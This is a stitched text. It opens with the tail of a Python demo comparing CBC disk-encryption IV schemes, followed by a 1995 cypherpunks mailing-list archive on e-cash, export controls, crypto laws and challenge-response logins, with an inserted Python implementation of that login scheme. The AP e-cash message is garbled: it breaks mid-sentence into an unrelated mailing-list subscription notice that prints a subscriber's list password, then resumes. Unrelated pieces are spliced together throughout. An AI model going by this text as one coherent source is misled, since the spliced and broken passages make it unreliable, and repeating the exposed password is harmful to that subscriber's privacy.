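        out += xor(decrypt_block(key, block), prev)
        prev = block
    return bytes(out)

def sector_number_iv(key, sector):
    # Scheme from the post: the IV is just the (public) sector number.
    return sector.to_bytes(BLOCK, "big")

def keyed_iv(key, sector):
    # Assumed remedy: encrypt the sector number under a second key derived
    # from the volume key, so the IV cannot be predicted without the key.
    iv_key = hashlib.sha256(key).digest()
    return encrypt_block(iv_key, sector.to_bytes(BLOCK, "big"))

def compare_iv_schemes(passphrase, a=6, b=7):
    """For each IV scheme, report whether two sectors whose plaintext was
    chosen using only the sector numbers encrypt to identical ciphertext."""
    key = derive_key(passphrase)
    marker = b"WATERMRK"               # constructed 8-byte pattern
    filler = bytes(SECTOR - BLOCK)     # rest of both sectors is identical
    # First blocks differ by exactly (a XOR b); no key material is used.
    plain_a = xor(marker, a.to_bytes(BLOCK, "big")) + filler
    plain_b = xor(marker, b.to_bytes(BLOCK, "big")) + filler
    result = {}
    for name, iv_fn in (("sector-number IV", sector_number_iv),
                        ("keyed IV", keyed_iv)):
        cipher_a = cbc_encrypt_sector(key, iv_fn(key, a), plain_a)
        cipher_b = cbc_encrypt_sector(key, iv_fn(key, b), plain_b)
        result[name] = (cipher_a == cipher_b)
    return result

if __name__ == "__main__":
    for scheme, identical in compare_iv_schemes(b"constructed passphrase").items():
        print("%-17s identical ciphertext sectors: %s" % (scheme, identical))
```

With the sector-number IV the XOR with the IV cancels the chosen difference, so the first cipher input is the same in both sectors and CBC carries the equality through all 512 bytes; with the keyed IV the two sectors encrypt differently.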




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 26 Jul 95 08:05:41 PDT
To: cypherpunks@toad.com
Subject: Economist on Data Deluge (NewsClip)
Message-ID: <199507261505.KAA06608@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


The Economist, July 22, 1995, pp. 77-78.


Data communications: Deluged


The World Wide Web, as its fans will tell you, lives up to its
name. This realm of the Internet lets you visit "home pages"
in Bangkok one moment and Bridlington the next. Yet bringing
home souvenirs is another matter. To pull all the nice goodies
on offer back to his own machine, the home Internaut must
squeeze them down a telephone wire. That slows things down,
sometimes a lot; this correspondent took two hours to download
100 seconds of the film "Interview with a Vampire". There must
be better ways to bring home the data.

There are. One is the cables that deliver television to two
out of three American homes. Companies such as Intel, General
Instruments and Zenith Electronics have been rushing to
perfect "cable modems" that squirt data into a personal
computer at speeds up to 4m bits per second -- 140 times
faster than the speediest telephone modems (28,800 bits per
second) used with PCs. But cable modems must wait for the
cable-TV companies to rewire their networks with two-way
connections; at the moment, cable TV is largely one way. Cable
companies such as Tele-Communications Inc, Viacom and Cox
expect to offer data connections with TV services within a
year.

Some Internet surfers are not prepared to wait that long. For
the past three months, some data-junkies in America have been
downloading from the sky. Hughes, having laid down a challenge
to the cable companies with its DirecTV satellite broadcasting
system, which is currently providing 150 channels to 500,000
subscribers, is now laying down another. Hughes Network
Systems of Germantown, Maryland, is offering a satellite
service called DirecPC that can beam down data to a subscriber
at a rate of 400,000 bits a second -- enough to transmit a
400-page document in less than a minute. With moderate
compression techniques, that would easily allow real-time
video.

For $995, the DirecPC customer gets a 61-centimetre (24-inch)
satellite dish, a coaxial cable, an adapter that fits inside
an IBM-type PC and the relevant software. Once installed,
subscribers pay $15.95 to download up to 30 megabytes of data
a month (which is a lot of text, but not much video). The
speed is many times faster than a special digital ISDN line
from the telephone company, and the initial cost less (though
with the ISDN line time is the only limit on the amount of
data downloaded). For an extra $24 a DirecPC customer can get
up to 130 megabytes a month.

The cable-TV companies are spending $7,000 or more a mile
(over $4,000 a kilometre) to make their cables funnel data out
as well as television in. Hughes has sidestepped this problem.
Subscribers send data out -- generally small bursts to request
information, transmit messages and the like -- through a
normal telephone modem. These few bytes can trigger a torrent
of returned data, taking the fast route to a Hughes ground
station, which beams it to a Galaxy IV communications
satellite in geosynchronous orbit. From there it is
retransmitted to the subscriber's mini-dish.

Apart from reaching the Internet and other online services
such as news, electronic shopping, stockmarket prices and
sports results, Hughes plans to use DirecPC and its successors
to distribute large packages of data on behalf of commercial
customers -- acting, in effect, as the Federal Express of the
digital world. The company has already signed a deal with IBM
to deliver software by satellite direct to shops, where it
will be replicated on disks or CD-ROMS at the customer's
request. Using better equipment, Hughes reckons it should have
no difficulty delivering digital packages at up to 2m bits a
second.

Sooner or later, the cable-TV companies will lick the "back
haul" problem. Then, one-way satellite systems such as DirecPC
may find themselves squeezed out of the business -- unless
they, too, offer subscribers the chance to talk back with a
mouth as big as their ears. Hughes has plans to allow such
interchanges through a system called Spaceway. Satellites with
huge antennae would pick up messages from little dishes and
relay them to other little dishes, allowing high
data-transmission rates all over the world. The company, with
a touch of hype, calls it an "information super skyway".

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 26 Jul 95 07:08:23 PDT
To: cypherpunks@toad.com
Subject: AP: Load Cash, Cruise Virtual Mall
Message-ID: <v02120d00ac3bfbc9aa61@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>WASHINGTON (AP) -- A day in the financial life of a future consumer may
>begin something like this: Wake up, log in, download some e-cash into
>your PC's hard drive, then go cruise the virtual mall.
>
>It's on the verge of happening, experts told Congress on Tuesday. But
>some caution that, without planning and coordination, the brave new
>Internet world of a cashless, checkless society could turn into an
>electronic From: listproc@mcfeeley.cc.utexas.edu
>Date: Sat, 20 May 1995 07:09:01 -0500
>Reply-To: listproc@mcfeeley.cc.utexas.edu
>Sender: listproc@mcfeeley.cc.utexas.edu
>To: rah@shipwright.com
>Cc: grgcombs@mail.utexas.edu
>Subject: SUBSCRIBE MCIP ROBERT HETTINGA
>X-Comment: Unix List Processor, version 6.0c/940712/0
>
>You have been added to list mcip@mcfeeley.cc.utexas.edu.
>The system has recorded your address as
>
>                        rah@shipwright.com
>
>and in order for your messages to get posted (if the list accepts postings),
>you will have to send them from this address, unless the list does not require
>subscription for posting.
>If a message is ever rejected, please contact the list's owner:
>grgcombs@mail.utexas.edu
>
>Your initial password is 800971739. Please change it as soon as you can
>by issuing the following request to listproc@mcfeeley.cc.utexas.edu:
>
>                SET MCIP PASSWORD 800971739 new-password
>
>WARNING: Do not use your login password; you will be breaching security at your
>site.
>
>This system may accept Internet TCP/IP connections for processing of live
>requests, and the password will be used to give you subscriber privileges.
>For more information, send a 'help live' request to
>listproc@mcfeeley.cc.utexas.edu.
>
>For information on this service and how to use it, send the following
>request in the body of a mail message to listproc@mcfeeley.cc.utexas.edu:
>
>                        HELP
>
>All requests should be addressed to listproc@mcfeeley.cc.utexas.edu.
>We are currently working on making a better interface for MacPGP, and other
>cryptographic programs, for Macintoshes.  You can obtain our latest release
>of the MacPGP Kit from ftp://duke.bwh.harvard.edu/pub/adam/mcip (The
>official MCIP ftp site), or from
>http://www.utexas.edu/~grgcombs/htmls/crypto.html (The unofficially
>official MCIP home page).  Knowledge of programming is not mandatory, but
>it would be helpful.  Being at least a mild Mac user (either now or in the
>past) *is* mandatory.     -- Gregory S. Combs <grgcombs@mail.utexas.edu>
>NOTE:  For some reason our list processor doesn't like the version number
>in PGP signed messages, so unless you want me to have to forward everything
>you write to the MCIP list, please don't sign your mail.  (ironic isn't
>it? "Tower of Babel."
>
>"On the Internet ... it is difficult to tell if a transaction has taken
>place since there is no central authority to track and report it," said
>David M. Van Lear, chief executive of Electronic Payment Services Inc.,
>a 2 1/2-year-old joint venture of four banks.
>
>"There are currently no standard operating regulations," he said. "In
>addition, there is no central authority to track and report on criminal
>activity, including counterfeiting and money laundering."
>
>It was all a bit mind-boggling for members of the House Banking monetary
>policy subcommittee, whose chairman, Rep. Michael Castle, R-Del.,
>observed, "Some of us can barely read our e-mail."
>
>But, more than 25,000 merchants in 150 countries are already on the
>Internet, selling or advertising products and services to 20 million
>users, a figure that will grow to 100 million within five years,
>according to MasterCard International.
>
>So, Castle said, "it is time for lawmakers to start grappling with the
>implications of an entirely new monetary system in cyberspace, one that
>transcends national governments and national boundaries."
>
>For instance, how will the Federal Reserve Board measure the amount and
>velocity of money flowing through the Internet? How will the Internal
>Revenue Service audit transactions conducted anonymously without paper
>records? What laws apply when a U.S. consumer orders a product from a
>business overseas and the goods never arrive?
>
>The lawmakers received seemingly conflicting advice from a panel of
>experts that included Van Lear, executives from MasterCard and Visa
>U.S.A. and Scott Cook, the chairman of the personal finance software
>company, Intuit Inc.
>
>They were told that government will be crucial to fostering stability of
>the new electronic monetary system and public trust in it but that
>premature or too much regulation could stifle innovation.
>
>The new technology, the experts said, will both open new avenues for
>fraud and offer new protections and safeguards.
>
>The system, some said, needs to be fully auditable so tax and criminal
>authorities can reconstruct a series of transactions but it also should
>protect Americans' privacy.
>
>For instance, David Chaum, the pony-tailed chairman of DigiCash Inc.,
>said his version of electronic cash, or e-cash, would provide the same
>privacy protection and anonymity in small transactions as traditional
>cash.
>
>Using encrypted codes and special software that offer much more security
>than the current unprotected transfer of credit card information via
>the Internet, consumers could download cash into the hard drive of their
>personal computers.
>
>They'd spend it by transferring it to merchants via computer. Or they
>could store the cash on "smart cards" equipped with a computer chip
>capable of storing far more information than the magnetic strips now on
>credit and debit cards.
>
>The cards then would function like pocket money and could be used in
>vending machines, parking meters and subway turnstiles equipped to
>receive them.
>
>MasterCard International and Visa are developing similar smart cards
>but, unlike Chaum's, theirs would generate an audit trail that could
>help law enforcement officials combatting tax evasion, counterfeiting
>and money laundering.
>
>Rosalind L. Fisher, executive vice president of Visa, a consortium of
>financial institutions, urged Congress to maintain public confidence in
>new forms of electronic payment by allowing them to be offered only
>through institutions to supervision by banking regulators.
>
>At the same time, she said, we are concerned that additional regulation
>in this area will "stifle innovations ... subjecting many of these
>products to ... premature death."
>
>By way of example, she cited a Federal Reserve regulation that, if
>applied, could require machines accepting smart cards to issue paper
>receipts, ruining the economic viability of the cards for such small
>purchases as a 75-cent soda.
>
>Castle, who plans at least one more hearing on the future of money this
>fall, agreed that Congress should hold off on legislating for now but
>should be prepared to move quickly if problems develop.
>
>"I don't think we need regulations now, but we had better be ready to
>respond ... if some guy can crack a code and create a million-dollar
>account, transfer it around a couple times and end up in the Bahamas,"
>he said.
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 26 Jul 95 08:28:57 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <2751@umlaw.demon.co.uk>
Message-ID: <9507261527.AA17090@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <2751@umlaw.demon.co.uk> Michael Froomkin writes:
>> Therefore, the only organization which can hold a
>> senator/representative liable for passing a bad law is the one which
>> passed the law. :(

>and the voters

Not in the sense of being able to punish him.  The voters may only
withhold their support in the next election.  Not nearly enough to
deter morons like Exon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 26 Jul 95 08:44:46 PDT
To: cypherpunks@toad.com
Subject: Re:      Crypto Law Survey
In-Reply-To: <MAILQUEUE-101.950726125335.448@frw3.kub.nl>
Message-ID: <D2ou9c1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I seem to recall that COCOM voted itself out of existence last year.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Wed, 26 Jul 95 04:13:03 PDT
To: sjb@austin.ibm.com
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
Message-ID: <2752@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <9507251610.AA16331@ozymandias.austin.ibm.com> Scott Brickner writes:

> Therefore, the only organization which can hold a
> senator/representative liable for passing a bad law is the one which
> passed the law. :(
> 
and the voters
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Amir Y. Rosenblatt" <axon@neuron.net>
Date: Wed, 26 Jul 95 07:50:42 PDT
To: cypherpunks@toad.com
Subject: NSA and the NCSA/Apache web servers
Message-ID: <Pine.SOL.3.91.950726103519.23445C-100000@pipe6>
MIME-Version: 1.0
Content-Type: text/plain



I was flipping through the Apache http Server Project's web site 
<http://www.apache.org/>  when I came across the following note:

   Note: We were informed by NCSA that the NSA (The US National Security
   Agency - yes, the folks who in 1994 said "we're only 10 years 
   behind schedule")  considered the hooks to encryption in NCSA's httpd 
   to be in violation of the munitions export law, thereby making its 
   distribution to foreign sites illegal. For various reasons, we decided 
   to remove the -DPEM_AUTH code completely.

This was followed by a pointer to http://www.apache.org/nopgp.html from 
which the following text was taken:

   On May 17th, 1995, we were asked by a representative of NCSA to remove 
   any copies of NCSA httpd prior to 1.4.1 from our web site. They were 
   mandated by the NSA to inform us that redistribution of pre-1.4.1 code 
   violated the same laws that make distributing Phill Zimmerman's PGP 
   package to other countries illegal. There was no encryption in NCSA's
   httpd, only hooks to publicly available libraries of PEM code. By the 
   NSA's rules, even hooks to this type of application is illegal. 

Wow -- hooks to encryption are unexportable -- now THAT's bullshit.  Sheesh.

	-Amir

       /\     Set the controls for the heart of the sun.    -Pink Floyd    
______/  \    ___________ __ __  _  _  _  _   .   .   . axon@neuron.net
          \  / 
           \/    For PGP 2.6 key send mail with subject: SEND PGPKEY





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.net>
Date: Tue, 25 Jul 95 21:19:20 PDT
To: Joel Hames <jhames@deltanet.com>
Subject: Banks on the Net (Was: Re: Questions about Conferences)
In-Reply-To: <9507251837.AA29943@deltanet.com>
Message-ID: <Pine.LNX.3.91.950726120904.8248A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jul 1995, Joel Hames wrote:

> 3)  Has anyone heard much about the security of First Security National
> Bank? (www.fsnb.com)

No such bank or domain: maybe you mean Security First Network Bank 
(www.sfnb.com). 

In any case, http://www.cybercash.com/directory.html contains a list of 
banks in USA, Canada and UK sporting Web pages.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 26 Jul 95 12:48:32 PDT
To: cypherpunks@toad.com
Subject: Challenge-response passwords (Was: big word listing)
Message-ID: <199507261944.MAA20832@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 PM 7/25/95 +0100, Andrew Spring wrote:
>Free-after-1997 example:
>        g is a generator of a prime p.
>        password is X (0<X<p);
>        password file has g^X mod p.
>        login server generates Y, issues challenge g^Y.
>        expected response is g^XY mod p
>        login client has X, generates (g^Y)^X = g^XY mod p.
>        J. Random SuperHacker can get g^X, and g^Y, but not g^XY.

It's _not_ free after 1997!  I thought of it last fall, was surprised I
couldn't find it anywhere in the literature, given that it's pretty obvious,
but eventually found that a guy from Siemens had patented it in Germany
and then gotten a US patent in ~1994.  Unfortunately, he phrased it in terms
of "commutative hash functions", with g^X mod p as an example, so it's more
general.
He also extended it to do two-way authentication (obviously the process can
be symmetrical if the user has a stored g^W from the server and can send a
challenge, but he found a way to save a step or two.)

I developed it because I was looking for a way to do authentication-only
public key stuff so the code would be exportable - this approach doesn't
generate a shared secret (since the otherwise-secret g^XY is exposed
as the response to the challenge.)  However, it's possible to extend it to
preserve the shared secret - instead of sending response g^XY mod p, send
        Hash(g^XY mod p)
and have the login server validate that.  One advantage is that the hash
can be much shorter than the whole g^XY mod p, e.g. 32-64 bits instead of
512-1024.

And you can now use (g^XY mod p) as a session key (for encrypted sessions)
or an authenticator (e.g. send Hash(Data,sequence#,sessionkey) as a MAC for
each packet).
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*
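
The exchange described in the message above, including the Hash(g^XY mod p) response and the per-packet MAC, written out as an added Python example (not code from the post or from anyone on the list). Assumptions: the 1024-bit RFC 2409 Second Oakley Group with g = 2 stands in for p and g, PBKDF2 maps a typed password to X, SHA-256 is the hash, the session key is a labelled hash of g^XY rather than the raw value, and HMAC-SHA-256 is swapped in for Hash(Data,sequence#,sessionkey).

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Assumed parameters: the 1024-bit prime of RFC 2409's Second Oakley Group, g = 2.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381"
    "FFFFFFFFFFFFFFFF", 16)
G = 2
P_LEN = (P.bit_length() + 7) // 8


def password_to_exponent(user: str, password: str) -> int:
    """Assumption: derive the secret X from a typed password with PBKDF2."""
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), user.encode(), 10_000)
    return int.from_bytes(raw, "big") + 2  # 256-bit value, so 1 < X < p - 1


def enroll(user: str, password: str) -> int:
    """Password-file entry: g^X mod p. X itself is never stored."""
    return pow(G, password_to_exponent(user, password), P)


def short_response(shared: int) -> bytes:
    """Hash(g^XY mod p), truncated to 64 bits as the message suggests."""
    return hashlib.sha256(b"response" + shared.to_bytes(P_LEN, "big")).digest()[:8]


def session_key(shared: int) -> bytes:
    """Key derived from g^XY, which never crosses the wire in this variant."""
    return hashlib.sha256(b"session" + shared.to_bytes(P_LEN, "big")).digest()


def client_respond(user: str, password: str, challenge: int) -> Tuple[bytes, bytes]:
    """Client side: (g^Y)^X mod p, returned as (short response, session key)."""
    # 0, 1 and p-1 would force a g^XY that does not depend on X.
    if not 1 < challenge < P - 1:
        raise ValueError("degenerate challenge")
    shared = pow(challenge, password_to_exponent(user, password), P)
    return short_response(shared), session_key(shared)


class LoginServer:
    def __init__(self, password_file: Dict[str, int]):
        self.password_file = password_file      # user -> g^X mod p
        self._pending: Dict[str, int] = {}      # user -> Y of the open challenge

    def challenge(self, user: str) -> int:
        y = secrets.randbelow(P - 3) + 2        # fresh Y for every login attempt
        self._pending[user] = y
        return pow(G, y, P)

    def verify(self, user: str, response: bytes) -> Optional[bytes]:
        """Return the session key on success, None on failure."""
        y = self._pending.pop(user, None)       # one use only, so replays fail
        verifier = self.password_file.get(user)
        if y is None or verifier is None:
            return None
        shared = pow(verifier, y, P)            # (g^X)^Y mod p
        if not hmac.compare_digest(short_response(shared), response):
            return None
        return session_key(shared)


def packet_mac(key: bytes, seq: int, data: bytes) -> bytes:
    """Per-packet authenticator over sequence number and data.

    HMAC-SHA-256 is swapped in here for the plain Hash(Data,sequence#,sessionkey).
    """
    return hmac.new(key, seq.to_bytes(8, "big") + data, hashlib.sha256).digest()


if __name__ == "__main__":
    # Constructed sample account and password, for demonstration only.
    server = LoginServer({"alice": enroll("alice", "constructed-demo-password")})
    g_y = server.challenge("alice")
    resp, client_key = client_respond("alice", "constructed-demo-password", g_y)
    server_key = server.verify("alice", resp)
    print("login ok:", server_key == client_key, "response bits:", len(resp) * 8)
    print("replay accepted:", server.verify("alice", resp) is not None)
```

The 1024-bit group matches the sizes mentioned in the message; a deployment today would pick a larger group.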





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 26 Jul 95 12:51:31 PDT
To: wb8foz@nrk.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
In-Reply-To: <199507261746.NAA00249@october.ducktown.org>
Message-ID: <9507261951.AA23210@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I collated all the questions into a large ungainly message and sent it
to Herb Lin.  He has been after me to go back over it and make a more
useful set of questions, which I haven't done yet.  He says they are
meeting with the FBI in September and want to get questions to them in
August (incorporating our ideas).  I've promised him I will get him the
formatted list of questions by the end of next week.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: E.J.Koops@kub.nl
Date: Wed, 26 Jul 95 03:54:38 PDT
To: cypherpunks@toad.com
Subject: Crypto Law Survey
Message-ID: <MAILQUEUE-101.950726125335.736@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


In a separate message is my survey of cryptography laws.

I welcome comments and corrections, but mail me before 31 July, as
I'm going on a six weeks' holiday next week.

I shall try and keep an updated version on my homepage, where it will
be available in a few weeks. To make the survey as wide and accurate
as possible, I greatly appreciate receiving additional information.

Regards,
Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 66 8101
Centre for Law and Informatization      facs    +31 13 66 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                               --------------------------------------
Postbus 90153                 |       "We forgot the crackers!"      |
5000 LE Tilburg               |                                      |
The Netherlands               |           Wallace and Gromit         |
---------------------------------------------------------------------
         http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: E.J.Koops@kub.nl
Date: Wed, 26 Jul 95 03:54:47 PDT
To: cypherpunks@toad.com
Subject: Crypto Law Survey
Message-ID: <MAILQUEUE-101.950726125335.448@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


    CRYPTO LAW SURVEY
    Version July 1995
    Bert-Jaap Koops (koops@kub.nl)
    Please credit if quoting.
    
    This survey of cryptography laws is based on several reports and on
    replies to a posting on Internet discussion lists. Only for France, The
    Netherlands, and Russia have I consulted original texts of relevant
    regulations; for the other countries, the reports listed below served as the
    only source. These findings, therefore, do not pretend to be exhaustive
    or fully reliable.
    I thank all who have provided me with information for this survey.
    Please send comments, corrections, updates, additional information, and
    questions to E.J.Koops@kub.nl.
    
    SOURCES
    [1]   KPMG EDP Auditors, Rapport aan de Ministers van 
    Binnenlandse Zaken, Justitie en Verkeer en Waterstaat inzake
    de uitkomsten van het Bedrijfseffectenonderzoek Cryptografie
     (Amstelveen, 7 april 1994), pp. 27-38, 107-114
    [2]   Moret Ernst & Young EDP Audit Management Services,
    Eindrapport onderzoek ontwerp-regeling encryptie,
    (Amsterdam, 1 maart 1994), pp. 21-30
    [3]   James P. Chandler, Diana C. Arrington, Donna R.
    Berkelhammer, and William L. Gill, Identification and Analysis
    of Foreign Laws and Regulations Pertaining to the Use of 
    Commercial Encryption Products for Voice and Data 
    Communications, DOE Project No. 2042-E024-A1, Washington, January 1994
    [4]   Andr Sylvain, Data Encryption and the Law(s) - Results, 
    posted on talk.politics.crypto, 15 December 1994
    [5]   various references; personal communications by Adam Back, 
    Peter Gervai, Ulf Moeller, Marc Plumb, and Thomas Quinot.
    
    -----------------------------------------------------------------------------------
    SURVEY PER COUNTRY
    1. Export/ import regulations
    2. Other laws/regulations pertaining to encryption
    3. Threats/ intentions to regulate encryption
    4. Regulations stimulating encryption use
    -----------------------------------------------------------------------------------
    
    _COCOM_
    1. COCOM (Coordinating Committee for Multilateral Export Controls)
    is an international organization (Japan, Australia, and all NATO
    members, Ireland excluded) for the mutual control (and restriction) of
    strategic arms export. It maintains, among others, the International
    Industrial List and the International Munitions List. In 1991, COCOM
    has decided to allow export of mass-market cryptographic software
    (including public domain software). Some member countries of COCOM
    follow its regulations, but others, such as Germany and the
    United States, maintain separate regulations.
    
    _Australia_ [1, 3]
    1. Written permission is needed for exporting cryptographic equipment
    designed to ensure the secrecy of communications or stored information.
    2. no
    3. no
    
    _Austria_ [1]
    2. no
    3. no
    
    _Belgium_ [1, 3]
    1. no
    2. no
    3. no
    
    _Brazil_ [3]
    1. no
    
    _Canada_ [1, 3, 4, 5]
    1. Canada follows COCOM regulations. The exportation of items from
    Canada may be subject to restriction if they are included on the Export
    Control List. All types of cryptography can be transported between
    Canada and the United States, but cryptography imported from the US
    remains under US ITAR rules and cannot be exported if the US does not
    allow export.
    2. no
    3. no (but Canada is monitoring the debate in the US)
    
    _People's Republic of China_ [3]
    1. China restricts the importation and exportation of voice-encoding
    devices.
    
    _Denmark_ [1, 4]
    2. no
    3. no
    4. The Danish Teletrust Group has set up an Encryption Group to work
    on the technical and legal concept of public-key certifying authorities. A
    Centre Certifying Authority (CCA) would coordinate control and
    certification of key centres to provide secure keys within
    telecommunications. It would be necessary for such a CCA to have a
    legal basis. The Danish government has not (yet) implemented the
    initiative into law.
    
    _European Union_ [5]
    2. no
    3. There are rumours that the EU is working on the establishment of a
    key escrow system to counter the US Clipper initiative. The EU system
    would allow member states to choose escrow agents where keys have to
    be deposited. The European Community's Green Book on the Security
    of Information Systems (Draft 4.0, 18 October 1993) poses a case for
    the provision of "Public Confidentiality Services" (which offer some sort
    of Government Access to Keys).
    
    _Finland_ [4, 5]
    2. no
    3. no
    
    _France_ [1, 3, 4]
    1. a) For exporting authentication- or integrity-only cryptography, a
    declaration dossier of export delivery must be deposited. A copy of the
    receipt of declaration must be presented to customs at each exportation.
    For temporary exportation, a user declaration will serve as export
    declaration in the case of cryptography used exclusively for personal use
    by an individual. A delivery declaration will serve as temporary-export
    declaration for a sample.
    b) For exporting any other kind of cryptography, apart from once
    depositing administrative and technical details needed for user or
    delivery authorisation, a license is needed for each exportation.
    2. Delivery, exportation, and use of cryptography are subjected to:
    a) previous declaration if the cryptography can have no other object than
    authenticating communications or assuring the integrity of transmitted
    messages;
    b) previous authorisation by the Prime Minister in all other cases.
    Simplified procedures exist for certain cryptography products or certain
    user categories. 
    For both declaration and authorisation, a dossier containing technical
    details and administrative data must be submitted. Authorisation can be
    subjected to certain conditions in order to reserve the use of certain
    types of cryptography to defined user or application categories.
    It is unclear to what extent this regulation is being maintained in practice.
    It seems impossible for individuals or enterprises to obtain authorisation
    for "strong" cryptography, such as RSA. Moreover, the office dealing
    with authorisation renders decisions without motivation.
    
    _Germany_ [1, 3, 4, 5]
    1. COCOM regulations, but Germany maintains export control of both
    public domain and mass-market encryption software.
    2. no
    3. Some politicians have expressed a desire to regulate cryptography,
    but, on the whole, there seems to be no threat that Germany will prepare
    a law on cryptography.
    
    _Hungary_ [5]
    2. no
    3. no
    4. There is a law that provides an agency with the competence to assess
    cryptography; the agency can declare that it satisfies a minimum security
    level.
    
    _Iceland_ [1]
    2. no
    3. no
    
    _India_ [3]
    1. no
    
    _Ireland_ [1]
    2. no
    3. no
    
    _Israel_ [3]
    1. Israel imposes restrictions on encryption, but the scope of its
    restrictions is not clear.
    
    _Italy_ [1, 3]
    1. COCOM regulations.
    2. There is a law that demands accessibility of encrypted records for the
    treasury.
    3. no
    
    _Japan_ [1, 3]
    1. COCOM regulations.
    2. no
    3. no
    
    _Latvia_ [4]
    2. no
    3. no
    
    _Mexico_ [3]
    1. no
    
    _The Netherlands_ [3, 4, 5]
    1. Public domain and mass-market software generally does not require a
    validated license. Items capable of file encryption do require a validated
    license.
    2. no
    3. In March 1994, a Dutch predraft law on cryptography leaked out, the
    drift of which was a prohibition of having, using, or trading strong
    cryptography. Those with a "legitimate concern" could apply for a user
    license or a trade authorization. One condition for granting a license was
    giving information to an administration agency; the text did not state
    whether this information concerned only the algorithm or also all the
    keys used.
    After many protests from those who would be affected by the proposed
    regulation, it was withdrawn. The Dutch authorities are currently
    studying alternatives to handle the issue.
    Although the draft regulation will not be continued in its present scope,
    it shows how much the judicial authorities fear wide dissemination of
    strong cryptography. It is to be expected that the Dutch government will
    want to regulate encryption in some way.
    
    _New Zealand_ [1]
    2. no
    3. no
    
    _Norway_ [1]
    2. no.
    4. A bill on information security has been proposed, which indicates that
    cryptography can be used for the storage of passwords. It is not sure if
    and when this bill will come into force.
    A bill has been proposed on central medical registries that would use
    cryptographically pseudonymized entries.
    
    _Russia_ [3, 5]
    1. A license is required for the importation of encryption facilities
    manufactured abroad.
    2. On 3 April 1995, president Jeltsin issued a decree prohibiting
    unauthorized encryption. State organizations and enterprises need a
    license to use encryption (for both authentication and secrecy, for
    storage as well as transmission). Other enterprises and organizations
    using uncertified cryptography do not receive state orders. The Central
    Bank shall take measures against commercial banks that do not use
    certified cryptography when communicating with divisions of the Central
    Bank. The development, production, implementation, or operation of 
    cryptography without a license is prohibited.
    
    _Saudi Arabia_ [3]
    1. no
    
    _South Africa_ [1, 3]
    1. no
    2. The South African situation is unclear. There appears to be legislation
    prohibiting the encryption of data on public telephone networks, but
    many companies and banks seem to ignore the legislation and do encrypt
    their data.
    
    _Spain_ [1]
    2. no
    3. no
    
    _Sweden_ [3, 4]
    1. no
    2. no
    3. no
    
    _Switzerland_ [1, 3]
    1. no
    2. no
    3. no
    
